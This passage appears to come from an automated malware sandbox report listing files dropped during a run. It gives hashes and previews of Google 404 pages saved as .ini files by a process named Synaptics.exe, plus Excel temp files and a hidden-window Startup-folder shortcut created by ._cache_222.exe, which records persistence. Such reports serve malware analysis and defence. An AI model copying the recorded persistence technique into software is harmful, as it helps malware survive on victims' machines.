                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.253627405952068
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0OdIWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                                                      MD5:00A01D57AB45ED99B8149EBC8CD39B94
                                                                                                                                      SHA1:96BCFF07641CE92822681F9677D85164522B536D
                                                                                                                                      SHA-256:59AB7ED4B1BCCD18026A3ECDA3AAAF9ABBBFF39E9D799A434282D48F7F2C4E65
                                                                                                                                      SHA-512:F065BA8F40BF5EA7CC7DD491F347A1AF68A00590CE17F0ECC7809239619DAF08C1D0A96ADA90878CE71E60CE05C40502A734B0CDBBD2BA055DA40C63F409DA53
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ln7CJfnZlmhFpkex4GbHNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\gMPsvyb.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.275728446420488
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0tSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                                      MD5:388ED3C25196E18FEED0A09F5470AA8D
                                                                                                                                      SHA1:AE7C51842195DEB0F2199EB3D10C55BC395A71AC
                                                                                                                                      SHA-256:17F077793876E137513764DBCBA74BC82A952CFE356C6AB07BA828C84A86714D
                                                                                                                                      SHA-512:B97CB01AED7F2B310823269C3C33E831B957B6EF9AAF4650C630C4EE3F902AA386B921533B30828B13127521EF3B638F3435AA189ED57FAAD15E2B44803AEFD2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GBqspq_ADivML3TvJZP35A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\hB1a32y.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.252786541242886
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0N9ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+QA+pAZewRDK4mW
                                                                                                                                      MD5:503D34781993483131303CE89F18868F
                                                                                                                                      SHA1:B62B38B9137EB6DD54667B1CB9C7AED390B9DA36
                                                                                                                                      SHA-256:AA0F9507519029E218F3B4FC290FCA2BADBC1A87E4C3861264E00614AFD958A9
                                                                                                                                      SHA-512:5C5C2847E11722CB8593A2727B0A7A59D0350F39739E44801A4AE5C982C6191F30625A8429E0F39EE5EFE1EE0A0534C7B99EA290BC3C23FD146B6C115E8C490E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NRPNL80dRiBc5fqpOpmllw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\iBIhmaY.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.25721626262713
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0HSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                                      MD5:C362711DCFFE702753D6C591CB9DA43D
                                                                                                                                      SHA1:02F9EEDA27AA58FB0EB82284E74DB8BB66234416
                                                                                                                                      SHA-256:334DA57A89F62F0C48199CF25431FED79FF90E9662EAAC404225933D73D40802
                                                                                                                                      SHA-512:0D3950D12913FEDD626FBA0974C6E5F796B03D7345C2C2D599E2CD8F2C3639F21E298754D32B4F748F7501C6ED7847769F013E7D2525976E8E713AE3ED63A9F0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xrhHmTf8iQNd3gJECULLeg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\lhi6F6p.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.256626772567488
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+P+pAZewRDK4mW
                                                                                                                                      MD5:F497990F8DF7B558566DBCD153E77884
                                                                                                                                      SHA1:225712E18C5357863D25AB02955CDEE37772D436
                                                                                                                                      SHA-256:1C88F3F46F8F90F17CDDD42358EADAD7A65F3A837072140A4F191C61F132DC7E
                                                                                                                                      SHA-512:4EC089AD035CBF7AE90B7BB5C24F6C648FD75C989589AFB3F81D27CFE5976EEBBAB53FF6363369F461E1D069AA391E5511B4C6A274D162D6624B72768A700215
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y5vzdZwWGhVQ8y8d5om3gg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\m4mX6br.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.269645110456817
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0NySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Ey+pAZewRDK4mW
                                                                                                                                      MD5:9FA8878B1DD017BD9ABEDE5782D65771
                                                                                                                                      SHA1:E59BB2934BCEDBDF438D1C39A28F9A9CB6F4FEBE
                                                                                                                                      SHA-256:1D565EC0A0F8E12707DE16DB73C784724E05E8FD6BB1E13EC406D61BF1B963D7
                                                                                                                                      SHA-512:6FB599654949B05F788DB82825E7821C89F27B9BF64FA781E1D69F4C6A9B0030554DBBD3FDC086DD38D3FDB0C223D87286527982FA1062793A83AEBBAFFD5E47
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mBP1LDQDzUzwrzSlj-w7AQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\mlOc6Vo.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.254215805308203
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                                      MD5:0D85261DFA11C334A17B27B388D53804
                                                                                                                                      SHA1:3C3C9F0619A773214F0517FB4144412A8EBCF3B7
                                                                                                                                      SHA-256:A6A5CF934F66D64E3E5CD74E15E0FCFB80B084CD2FB6EDDAF4AE01F56760963C
                                                                                                                                      SHA-512:7BACDF0D8FD8C7082EBEA1A6FF71A8AA42446C6E27F512B2FA913B07E9E84B9204EF6AF78BED5CC4796092993B2D6DB0F47E00337CFEC4F5C24CBD27BB7DFACE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Jt-wIT9uosPonD6dqC1bTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\oOrbzNP.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.280360244913426
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0iXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T+pAZewRDK4mW
                                                                                                                                      MD5:BB2A8AB72D7DE96AB8A8FFD959AE1CCD
                                                                                                                                      SHA1:422140E520EDF79530A961EF943FF2BF6217B867
                                                                                                                                      SHA-256:EF6853CA10E66E83B108D611353C34AAEB540BF6C68AAA79DA8847DA83D89F3A
                                                                                                                                      SHA-512:66F3B249B26958D708B4B0951114BCDA2BD558D1C3354425B890B1ACB70A5D28E86C1C96CDBD29F61724E059CD15ED06C1D04146B5C4BCC3492C29CFE6D579E1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vSTGKChDCRGw2ARI6AefOQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\pXs5Kul.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.261501071452724
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0abSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                      MD5:CE91FE697EB65341F57864F9D669E6C8
                                                                                                                                      SHA1:7D56A7B5BD2AD13F1C467560E1B6D1B1036931DE
                                                                                                                                      SHA-256:AE4303F796A66DC547EB19829D109AD7BC1F1AA824DF431205E96784D2C49B3D
                                                                                                                                      SHA-512:AFBFC06AD4B3A8A63F374517DC91E2BE337D22D62AB0272C9A2127589344800B831FAE32E2225D078DAA18D98228A5F5F29E12330C8CB96287B6338E86FCC4DA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="r5Xq3BZU5MxK8kx10vPp1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\yAUtrtb.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2560418384543555
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                                                      MD5:E82190DF3B11D22E7C09F458E32F4178
                                                                                                                                      SHA1:F6F68AAFAACAB5B4195F970BA2206A0EA6A81B42
                                                                                                                                      SHA-256:11932F1A7B433CEE9FE6766FA5C74910D696D9F10B677E3B2CB03E5FE14BAC04
                                                                                                                                      SHA-512:AE517E4C07AE34139985F6D79FDFD682CDE6030BEC071E7DF4F4EF071CE8012EF5B7855C2FAF9B7A17F53743C54CF79C3EBE8C0B7D093AB7F3F49CAC4E86196E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="v51KvKkEc0TpQet3CoUQ3w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\zBaX3To.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.2585054178951465
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                                                                      MD5:CA352B7DDE3158C740070F1A7F0B1BEC
                                                                                                                                      SHA1:D22CC3570246CA549AB4E40DDF741D44962B115B
                                                                                                                                      SHA-256:F38012119C7D810625CD4FF5934A428FE8CA85FFFCB7918E76E9DB561116EB11
                                                                                                                                      SHA-512:DBD9C55C2D7A67EB976EA6CC46A1247CF353AC44AC24E7CEC54A9B2251B14D5A426C9B2E08D571DCABC12C2793E76A535ED23CB870AB66DA37B120533A8E0ED2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EmFOaPHpfjwnhKtJO5U2mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\zJIBJl6.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.262114745598291
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0s9ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u+pAZewRDK4mW
                                                                                                                                      MD5:152FBD34E335DFD605119369004BCEA4
                                                                                                                                      SHA1:C4AD71E2C80B0994799527EF894E316E6986F13D
                                                                                                                                      SHA-256:17E0AADC806B03B38ADAD0D201FB005646C6C6B65AB28B3AC70479B352C635E8
                                                                                                                                      SHA-512:FEF0DE0D19AF6F68A70F471C9F589BD49D6ED80F94815102899B3EB17520AC3A45931B9BA2491CDD9F839ADD7CA5EC138E96FC88BC7A09D2E365CB1D72999DA2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Fs9QufiLva4Mh52pVYBNrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\zonydNQ.ini

                                                                                                                                      Download File
                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1652
                                                                                                                                      Entropy (8bit):5.264359374871053
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                                      MD5:78EF7A6792C72516F8649FC65435AC30
                                                                                                                                      SHA1:886C276FE260AD39E7E176FB76F65F285A5A8C6F
                                                                                                                                      SHA-256:18D4703FA3DE1836B6A15BDF4663C3992BDAA7162D2FC0D7B9F7EB10A9353C1E
                                                                                                                                      SHA-512:22743ADD3266B382C2904401510BA13A7AA99CE8D4ACFF9612C228FE8D431984CE5389E9A7B3BE63C645CEB30A37A537C5AC241EE5AAF66E237243C518A1D66A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="02Y0NfBYWJDxsi3Zb2eMlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                      C:\Users\user\AppData\Local\Temp\~$XJVR1Oh1.xlsm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):165
                                                                                                                                      Entropy (8bit):1.5231029153786204
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:sYp5lFltt:sYp5Nv
                                                                                                                                      MD5:B77267835A6BEAC785C351BDE8E1A61C
                                                                                                                                      SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                                                                                                                                      SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                                                                                                                                      SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF6A3EB0BE5C6F998C.TMP

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):32768
                                                                                                                                      Entropy (8bit):3.746897789531007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                      MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                      SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                      SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                      SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HBMQLS.lnk

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\._cache_222.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:22:56 2024, mtime=Mon Dec 30 09:22:56 2024, atime=Mon Dec 30 09:22:56 2024, length=952320, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1808
                                                                                                                                      Entropy (8bit):3.396160731956181
                                                                                                                                      Encrypted:false
